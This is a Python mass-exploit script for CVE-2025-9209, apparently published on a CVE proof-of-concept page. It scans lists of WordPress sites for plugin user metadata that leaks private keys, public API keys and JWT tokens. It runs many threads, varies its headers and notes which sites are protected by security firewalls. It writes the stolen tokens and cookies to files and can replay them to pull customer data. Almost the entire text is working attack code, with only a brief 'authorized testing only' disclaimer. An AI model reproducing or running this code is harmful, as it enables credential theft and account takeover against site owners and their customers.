5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-9209.py PY
#!/usr/bin/env python3

from __future__ import annotations
import requests
import urllib3
import json
import re
import threading
import time
import shutil
import subprocess
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
from typing import Dict, List, Tuple, Optional

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
OUT_FILE        = Path("exposures.txt")
TOKENS_FILE     = Path("tokens.txt")
EXPLOITED_FILE  = Path("exploited_sites.txt")
COOKIES_FILE    = Path("cookies.txt")
DEFAULT_THREADS = 10
DEFAULT_DELAY   = 0.2
REQUEST_TIMEOUT = 14

try:
    from colorama import Fore, Style, init as color_init
    color_init(autoreset=True)
except Exception:
    class _C: pass
    Fore = _C(); Style = _C()
    Fore.GREEN = Fore.LIGHTYELLOW_EX = Fore.LIGHTBLACK_EX = Fore.YELLOW = Fore.CYAN = Fore.RED = Fore.WHITE = Fore.MAGENTA = ""
    Style.BRIGHT = Style.NORMAL = ""

DEFENDER_INDICATORS = [
    "Access denied",
    "AntiBot Unlock Me",
    "Access denied by Imunify360",
    "AntiBot Global Firewall",
    "altcha",
    "/wp-admin/admin-ajax.php?action=wp_defender",
    "imunify",
    "blocked your ip",
    "blocked your IP",
]

HEADER_VARIANTS = [
    {"User-Agent": "curl/7.86.0", "Accept": "*/*", "Connection": "keep-alive"},
    {"User-Agent": "curl/7.86.0", "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"},
    {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"},
]

file_lock = threading.Lock()

RE_BCRYPT = re.compile(r'^\$2[ayb]\$')
RE_JWT    = re.compile(r'^eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-\.=]*')
RE_HEX    = re.compile(r'^[0-9a-fA-F]+$')

def print_banner():
    banner = r'''
                                                                                    
@@@  @@@  @@@  @@@  @@@@@@@   @@@        @@@@@@   @@@  @@@@@@@  @@@@@@@@  @@@@@@@   
@@@@ @@@  @@@  @@@  @@@@@@@@  @@@       @@@@@@@@  @@@  @@@@@@@  @@@@@@@@  @@@@@@@@  
@@!@!@@@  @@!  !@@  @@!  @@@  @@!       @@!  @@@  @@!    @@!    @@!       @@!  @@@  
!@!!@!@!  !@!  @!!  !@!  @!@  !@!       !@!  @!@  !@!    !@!    !@!       !@!  @!@  
@!@ !!@!   !@@!@!   @!@@!@!   @!!       @!@  !@!  !!@    @!!    @!!!:!    @!@  !@!  
!@!  !!!    @!!!    !!@!!!    !!!       !@!  !!!  !!!    !!!    !!!!!:    !@!  !!!  
!!:  !!!   !: :!!   !!:       !!:       !!:  !!!  !!:    !!:    !!:       !!:  !!!  
:!:  !:!  :!:  !:!  :!:        :!:      :!:  !:!  :!:    :!:    :!:       :!:  !:!  
 ::   ::   ::  :::   ::        :: ::::  ::::: ::   ::     ::     :: ::::   :::: ::  
::    :    :   ::    :        : :: : :   : :  :   :       :     : :: ::   :: :  :   
                                                                                    
'''
    print(Fore.GREEN + Style.BRIGHT + banner)
    print(Fore.GREEN + Style.BRIGHT + "Mass Exploit for CVE-2025-9209  By: Nxploited (Khaled ALenazi)".center(86))
    print(Fore.CYAN + Style.BRIGHT + "GitHub: https://github.com/Nxploited    |    Telegram: @KNxploited (contact via Telegram)".center(86))
    print(Fore.YELLOW + Style.BRIGHT + "\nAuthorized testing only. Use this tool only on data/systems you are permitted to test.\n")

def is_defender_block(text: str) -> bool:
    if not text: return False
    low = text.lower()
    for token in DEFENDER_INDICATORS:
        if token.lower() in low:
            return True
    return False

def run_curl_get(url: str, timeout: int = 15) -> Tuple[str, int]:
    cmd = ["curl", "-k", "-s", "--max-time", str(int(timeout)), "-L", url]
    try:
        p = subprocess.run(cmd, capture_output=True, text=True)
        return p.stdout or "", p.returncode
    except Exception:
        return "", 1

def normalize_site(line: str) -> str:
    s = line.strip()
    if not s:
        return ""
    if not s.startswith("http://") and not s.startswith("https://"):
        s = "https://" + s
    return s.rstrip('/')

def inspect_user_meta(user: Dict) -> List[Dict]:
    found = []
    meta = user.get("meta") or {}
    pk = meta.get("_rp_api_user_private_key")
    if isinstance(pk, str) and RE_BCRYPT.match(pk):
        found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_private_key", "meta_value": pk, "kind": "private_key"})
    pub = meta.get("_rp_api_user_public_key")
    if isinstance(pub, str) and (RE_HEX.match(pub) or len(pub) > 40):
        found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_public_key", "meta_value": pub, "kind": "public_key"})
    tok = meta.get("_rp_api_user_token_key")
    if isinstance(tok, str) and RE_JWT.match(tok):
        found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_token_key", "meta_value": tok, "kind": "token"})
    return found

def summarize_value(val: str, keep_full: bool=False) -> str:
    if keep_full: return val
    if not val: return ""
    v = str(val)
    if len(v) <= 20:
        return v
    return v[:10] + "..." + v[-10:]

def write_exposure(site: str, user_id: str, meta_key: str, summary: str):
    with file_lock:
        try:
            if not OUT_FILE.exists():
                OUT_FILE.write_text("# timestamp | site | user_id | meta_key | summary\n", encoding="utf-8")
            ts = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
            with OUT_FILE.open("a", encoding="utf-8") as fh:
                fh.write(f"{ts} | {site} | {user_id} | {meta_key} | {summary}\n")
        except Exception: pass

def write_token(site: str, user_id: str, token: str):
    with file_lock:
        try:
            if not TOKENS_FILE.exists():
                TOKENS_FILE.write_text("# site | user_id | token\n", encoding="utf-8")
            with TOKENS_FILE.open("a", encoding="utf-8") as fh:
                fh.write(f"{site} | {user_id} | {token}\n")
        except Exception: pass

def write_exploited(site: str, count: int):
    with file_lock:
        try:
            if not EXPLOITED_FILE.exists():
                EXPLOITED_FILE.write_text("# site | exploited | count\n", encoding="utf-8")
            with EXPLOITED_FILE.open("a", encoding="utf-8") as fh:
                fh.write(f"{site} | exploited | {count}\n")
        except Exception: pass

def write_cookies(site, user_id, cookie, cookies_dict):
    with file_lock:
        try:
            if not COOKIES_FILE.exists():
                COOKIES_FILE.write_text("# site | user_id | cookie | cookie_dict\n", encoding="utf-8")
            with COOKIES_FILE.open("a", encoding="utf-8") as fh:
                fh.write(f"{site} | {user_id} | {cookie} | {cookies_dict}\n")
        except Exception: pass

def try_parse_json_fuzzy(text: str):
    if not text: return None
    try:
        return json.loads(text)
    except Exception: pass
    # Attempt fuzzy recovery of JSON from output
    first = None
    for i, ch in enumerate(text):
        if ch in ('{','['):
            first = i
            break
    if first is None: return None
    last = max(text.rfind('}'), text.rfind(']'))
    if last <= first: return None
    try:
        return json.loads(text[first:last+1])
    except Exception: return None

def verify_credentials(site: str, user_id: str, token: str, api_key: str) -> Tuple[bool, int, str, str, dict]:
    url = site.rstrip('/') + "/wp-json/rp/v1/customers"
    headers = {
        "Authorization": f"Bearer {token}",
        "X-API-Key": api_key,
        "X-User-ID": str(user_id),
        "Accept": "application/json",
        "User-Agent": "curl/7.86.0",
    }
    try:
        r = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT, verify=False, allow_redirects=True)
        cookie_str = r.headers.get("Set-Cookie", "")
        cookies_dict = r.cookies.get_dict()
        body = r.text or ""
        snippet = (body[:400] + "...") if len(body) > 400 else body
        return (r.status_code == 200, r.status_code, snippet, cookie_str, cookies_dict)
    except Exception as e:
        return False, -1, str(e), "", {}

def print_mass_exploit(site: str, count: int):
    box = "═" * 86
    print(Fore.GREEN + Style.BRIGHT + box)
    print(Fore.GREEN + Style.BRIGHT + f" 💚💚💚 MASS EXPLOIT SUMMARY — {site} ".center(86, "═"))
    print(Fore.GREEN + Style.BRIGHT + box)
    print(Fore.GREEN + Style.BRIGHT + f"┃ Accounts found:      {Style.BRIGHT}{count}")
    print(Fore.GREEN + Style.BRIGHT + box)
    print()

def print_success(site: str, user_id, meta_key: str, kind: str):
    box = "─" * 86
    print(Fore.GREEN + Style.BRIGHT + "[ SUCCESS ]".center(86))
    print(Fore.GREEN + Style.NORMAL + f"┃ Site:    {Style.BRIGHT}{site}")
    print(Fore.GREEN + Style.NORMAL + f"┃ User ID: {Style.BRIGHT}{user_id}")
    print(Fore.GREEN + Style.NORMAL + f"┃ Key:     {Style.BRIGHT}{meta_key}")
    print(Fore.GREEN + Style.NORMAL + f"┃ Type:    {Style.BRIGHT}{kind}")
    print(Fore.GREEN + box)
    print()

def print_token_found(site: str, user_id, token: str):
    box = "═" * 86
    print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
    print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + "➡️ TOKEN FOUND ⬅️".center(86))
    print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
    print(Fore.LIGHTYELLOW_EX + f"┃ Site:    {Style.BRIGHT}{site}")
    print(Fore.LIGHTYELLOW_EX + f"┃ User ID: {Style.BRIGHT}{user_id}")
    print(Fore.LIGHTYELLOW_EX + f"┃ Token:   {Style.BRIGHT}⇒ {token[:18]}...{token[-18:]}")
    print(Fore.LIGHTYELLOW_EX + box)
    print()

def print_cookie_found(site, user_id, cookie):
    box = "═" * 86
    print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
    print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + "🍪 COOKIE FOUND 🍪".center(86))
    print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
    print(Fore.LIGHTYELLOW_EX + f"┃ Site:    {Style.BRIGHT}{site}")
    print(Fore.LIGHTYELLOW_EX + f"┃ User ID: {Style.BRIGHT}{user_id}")
    print(Fore.LIGHTYELLOW_EX + f"┃ Cookie:  {Style.BRIGHT}⇒ {cookie}")
    print(Fore.LIGHTYELLOW_EX + box)
    print()

def print_failed(site, status=None, ctype=None, snippet=""):
    box = "░" * 86
    print(Fore.LIGHTBLACK_EX + Style.BRIGHT + "[ FAILED ]".center(86))
    print(Fore.LIGHTBLACK_EX + Style.NORMAL + f"┃ Site:    {Style.BRIGHT}{site}")
    if status is not None:
        print(Fore.LIGHTBLACK_EX + f"┃ Status:  {Style.BRIGHT}{status}")
    if ctype is not None:
        print(Fore.LIGHTBLACK_EX + f"┃ Type:    {Style.BRIGHT}{ctype}")
    if snippet:
        print(Fore.LIGHTBLACK_EX + f"┃ Detail:  {Style.NORMAL}{snippet[:80]}...")
    print(Fore.LIGHTBLACK_EX + Style.BRIGHT + box)
    print()

def print_blocked(site):
    box = "▒" * 86
    print(Fore.YELLOW + Style.BRIGHT + box)
    print(Fore.YELLOW + Style.BRIGHT + "[ BLOCKED ]".center(86))
    print(Fore.YELLOW + Style.BRIGHT + box)
    print(Fore.YELLOW + Style.BRIGHT + f"┃ Site:   {site}")
    print(Fore.YELLOW + Style.BRIGHT + f"┃ Status: Protected by Defender/Imunify360")
    print(Fore.YELLOW + Style.BRIGHT + box)
    print()

def scan_site(site: str, verify: bool=False, curl_fallback: bool=False) -> dict:
    api_users = site.rstrip('/') + "/wp-json/wp/v2/users?per_page=100"
    last_text = ""
    status = None
    ctype = None
    found_tokens = []
    exposures = []
    for idx, hdrs in enumerate(HEADER_VARIANTS, start=1):
        try:
            s = requests.Session()
            s.headers.update(hdrs)
            r = s.get(api_users, timeout=REQUEST_TIMEOUT, verify=False, allow_redirects=True)
            status = getattr(r, "status_code", None)
            ctype = r.headers.get("Content-Type", "") if r is not None else ""
            last_text = r.text or ""
        except Exception:
            last_text = ""
            r = None
            status = None
            ctype = None
        if is_defender_block(last_text):
            print_blocked(site)
            return {"site": site, "status": status, "content_type": ctype, "exposures": [], "blocked": True}
        parsed = try_parse_json_fuzzy(last_text)
        if isinstance(parsed, list):
            for user in parsed:
                found = inspect_user_meta(user)
                if found:
                    for f in found:
                        exposures.append(f)
        elif isinstance(parsed, dict):
            found = inspect_user_meta(parsed)
            if found:
                for f in found:
                    exposures.append(f)
        if exposures:
            if len(exposures) > 1:
                print_mass_exploit(site, len(exposures))
                write_exploited(site, len(exposures))
            for e in exposures:
                user_id = e.get("user_id")
                meta_key = e.get("meta_key")
                val = e.get("meta_value")
                kind = e.get("kind")
                summary = summarize_value(val, keep_full=False)
                if kind == "token":
                    print_token_found(site, user_id, val)
                    write_token(site, str(user_id), val)
                    found_tokens.append((site, user_id, val))
                    if verify:
                        pub = None
                        for x in exposures:
                            if x.get("kind") == "public_key" and (x.get("user_id") == user_id):
                                pub = x.get("meta_value")
                                break
                        if pub:
                            ok, sc, snippet, cookie_str, cookies_dict = verify_credentials(site, user_id, val, pub)
                            if cookie_str or cookies_dict:
                                print_cookie_found(site, user_id, cookie_str if cookie_str else str(cookies_dict))
                                write_cookies(site, str(user_id), cookie_str, cookies_dict)
                print_success(site, user_id, meta_key, kind)
                write_exposure(site, str(user_id), meta_key, summary)
            return {"site": site, "status": status, "content_type": ctype, "exposures": exposures, "blocked": False, "tokens": found_tokens}
        time.sleep(0.12)
    if curl_fallback:
        curl_path = shutil.which("curl")
        if curl_path:
            curl_out, rc = run_curl_get(api_users, timeout=REQUEST_TIMEOUT)
            if curl_out:
                if is_defender_block(curl_out):
                    print_blocked(site)
                    return {"site": site, "status": None, "content_type": None, "exposures": [], "blocked": True}
                parsed2 = try_parse_json_fuzzy(curl_out)
                exposures = []
                found_tokens = []
                if isinstance(parsed2, list):
                    for user in parsed2:
                        found = inspect_user_meta(user)
                        if found:
                            exposures.extend(found)
                elif isinstance(parsed2, dict):
                    found = inspect_user_meta(parsed2)
                    if found:
                        exposures.extend(found)
                if exposures:
                    if len(exposures) > 1:
                        print_mass_exploit(site, len(exposures))
                        write_exploited(site, len(exposures))
                    for e in exposures:
                        user_id = e.get("user_id")
                        meta_key = e.get("meta_key")
                        val = e.get("meta_value")
                        kind = e.get("kind")
                        summary = summarize_value(val, keep_full=False)
                        if kind == "token":
                            print_token_found(site, user_id, val)
                            write_token(site, str(user_id), val)
                            found_tokens.append((site, user_id, val))
                            if verify:
                                pub = None
                                for x in exposures:
                                    if x.get("kind") == "public_key" and (x.get("user_id") == user_id):
                                        pub = x.get("meta_value")
                                        break
                                if pub:
                                    ok, sc, snippet, cookie_str, cookies_dict = verify_credentials(site, user_id, val, pub)
                                    if cookie_str or cookies_dict:
                                        print_cookie_found(site, user_id, cookie_str if cookie_str else str(cookies_dict))
                                        write_cookies(site, str(user_id), cookie_str, cookies_dict)
                        print_success(site, user_id, meta_key, kind)
                        write_exposure(site, str(user_id), meta_key, summary)
                    return {"site": site, "status": None, "content_type": None, "exposures": exposures, "blocked": False, "tokens": found_tokens}
    print_failed(site, status, ctype, last_text)
    return {"site": site, "status": status, "content_type": ctype, "exposures": [], "blocked": False, "tokens": []}

def main():
    print_banner()
    sites_file = input("Enter sites filename (one per line): ").strip()
    if not sites_file:
        print(Fore.RED + "No file provided. Exiting.")
        return
    p = Path(sites_file)
    if not p.exists():
        print(Fore.RED + f"File not found: {sites_file}")
        return
    try:
        threads = int(input(f"Thread concurrency (default {DEFAULT_THREADS}): ").strip() or DEFAULT_THREADS)
    except Exception:
        threads = DEFAULT_THREADS
    verify_choice = input("Verify discovered token+api_key by calling /wp-json/rp/v1/customers? (y/N): ").strip().lower()
    verify = (verify_choice == "y")
    curl_choice = input("Use curl fallback if requests fails? (y/N): ").strip().lower()
    curl_fallback = (curl_choice == "y")
    try:
        polite_delay = float(input(f"Polite delay between requests per-thread (seconds, default {DEFAULT_DELAY}): ").strip() or DEFAULT_DELAY)
    except Exception:
        polite_delay = DEFAULT_DELAY
    sites = []
    with open(sites_file, "r", encoding="utf-8") as fh:
        for line in fh:
            s = normalize_site(line)
            if s:
                sites.append(s)
    total = len(sites)
    print(Fore.CYAN + f"\nScanning {total} sites with {threads} threads (verify={verify} curl_fallback={curl_fallback})\n")

    start = time.time()
    def worker(site: str):
        scan_site(site, verify=verify, curl_fallback=curl_fallback)
        time.sleep(polite_delay)
    with ThreadPoolExecutor(max_workers=threads) as exe:
        futures = [exe.submit(worker, s) for s in sites]
        try:
            for _ in as_completed(futures):
                pass
        except KeyboardInterrupt:
            print(Fore.RED + "\nInterrupted by user. Shutting down.")
            exe.shutdown(wait=False)
    elapsed = time.time() - start
    print(Fore.GREEN + f"\n[Done] in {elapsed:.1f} seconds.")
    print(Fore.GREEN + f"\n[exposures.txt] : exposures per account/credential")
    print(Fore.LIGHTYELLOW_EX + f"[tokens.txt] : All tokens found in scan")
    print(Fore.LIGHTYELLOW_EX + f"[cookies.txt] : All cookies found in scan")
    print(Fore.GREEN + f"[exploited_sites.txt] : Mass exploited sites")

if __name__ == "__main__":
    main()